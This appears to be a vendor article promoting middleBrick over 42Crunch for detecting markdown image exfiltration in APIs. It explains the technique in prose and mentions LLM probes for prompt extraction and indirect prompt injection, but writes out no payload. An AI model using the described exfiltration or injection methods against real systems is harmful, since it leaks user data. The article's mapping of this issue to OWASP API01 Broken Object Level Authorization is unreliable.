Migrating from 42Crunch to middleBrick for Markdown image exfiltration check

Markdown is widely accepted as a lightweight formatting syntax, but when user-controlled content is rendered without strict validation, it can become an implicit outbound channel. An attacker can embed image syntax with a remote URL, and if the renderer fetches that image, the request can leak sensitive context including session tokens or internal hostnames. The scanner inspects submission text for image patterns and related protocols to surface this risk before it reaches production renderers.

42Crunch provides protection within its managed gateway, yet coverage is limited to requests that pass through its infrastructure. middleBrick operates as a black-box scanner that evaluates the live API surface independent of runtime stack, detecting markdown injection vectors that bypass gateway rules. Because scanning is read-only and does not require code access, it fits into any language or cloud environment without deploying sensors or agents.

Key improvements include broader input validation coverage, detection of dangerous HTTP methods and wildcard CORS that facilitate outbound data paths, and LLM adversarial probes specifically designed to test prompt handling and data exfiltration paths. The scanner correlates findings across authentication misconfigurations and property over-exposure to map how markdown payloads might leverage trust boundaries.

To evaluate your API for markdown image exfiltration risk, submit a reachable endpoint URL through the dashboard or CLI. The scan completes under a minute using read-only methods, such as GET and HEAD, plus text-only POST for LLM probes. You receive a risk score from A to F and prioritized findings that highlight where markdown parsing may expose internal data.

Example CLI usage:

middlebrick scan https://api.example.com/openapi.json

Authenticated scanning, when enabled with Bearer or API key credentials, allows deeper path coverage while respecting a strict header allowlist. Domain verification ensures that only the domain owner can run authenticated scans, preserving signal relevance.

Findings are mapped to OWASP API Top 10 (2023), SOC 2 Type II controls, and PCI-DSS 4.0 validation points. For example, unchecked markdown rendering that permits remote image inclusion aligns with OWASP API01:2023 Broken Object Level Authorization and supports audit evidence for SOC 2 monitoring requirements. The scanner does not claim compliance, but the output helps you prepare evidence for review and refine existing controls.

Detection categories relevant to image exfiltration include Input Validation, Data Exposure, and LLM / AI Security probes that test system prompt extraction and indirect prompt injection. This layered approach highlights how markdown inputs can interact with broader API weaknesses.

middleBrick identifies indicators and provides remediation guidance, but it does not patch, block, or fix runtime behavior. Destructive payloads are never sent; private IPs, localhost, and cloud metadata endpoints are blocked at multiple layers. Customer data is deletable on demand and is never used for model training.

Limitations specific to image exfiltration include no active SQL injection or command injection testing, no blind SSRF detection without out-of-band infrastructure, and no replacement for a human pentester when business logic context is required. Continuous monitoring can schedule regular rescans and diff findings across runs, but ongoing tuning is necessary to reduce false positives and keep signal high.